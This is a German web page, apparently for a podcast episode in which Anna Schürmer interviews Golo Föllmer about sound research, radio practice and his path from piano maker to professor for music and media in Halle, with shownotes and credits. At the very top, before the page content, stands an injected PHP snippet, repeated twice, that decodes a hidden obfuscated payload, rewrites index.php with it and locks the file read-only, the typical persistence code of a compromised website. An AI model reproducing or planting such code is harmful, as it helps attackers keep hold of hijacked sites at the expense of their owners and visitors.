$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } »Musikalische Klänge und auch der ganze Rest«. Golo Föllmer über experimentelle Klangforschung und Sounds zwischen Musik und Medien – Auditive Medienkulturen

»Musikalische Klänge und auch der ganze Rest«. Golo Föllmer über experimentelle Klangforschung und Sounds zwischen Musik und Medien

Golo Föllmer versteht unter Soundforschung den Versuch, Klangphänomene im Kontext zu beschreiben: »und zwar definitiv von Anfang an sowohl musikalische Klänge, aber dann eben auch der ganze Rest.« Im Gespräch mit Anna Schürmer spricht er über seinen Weg vom Klavierbauer zum Professor für Musik und Medien an der Uni Halle, über das Radio-machen und weitere erfahrungspraktische Zugänge.

Shownotes

Affiliation – Martin-Luther-Universität Halle-Wittenberg: Brückenprofessur ›Musik und Medien‹ (MuM)

RadioforschungTransnational Radio Encounters | Radio Aesthetics, Radio Identities | Online Radio Master

Radiopraxis – Moderation der Sendereihe Klangkunst bei Deutschlandfunk Kultur

Publikationen – Monographien | Herausgeberschaften | Buch- und Zeitschriftenbeiträge | Lexika-Einträge | Rezensionen | Berichte

Projekte – Dystopie Sound Art Festival 2018Berliner Hörspielfestival 2020 | Soundexchange

MitgliedschaftenGesellschaft für Medienwissenschaft  | AG Auditive Kultur und Sound Studies | Studienkreis Rundfunk und Geschichte e.V. | Errant Sound | Deutsche Gesellschaft für elektroakustische Musik (DEGEM)


Credits

Interview: Anna Schürmer
Schnitt: Leon Fiedler
Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)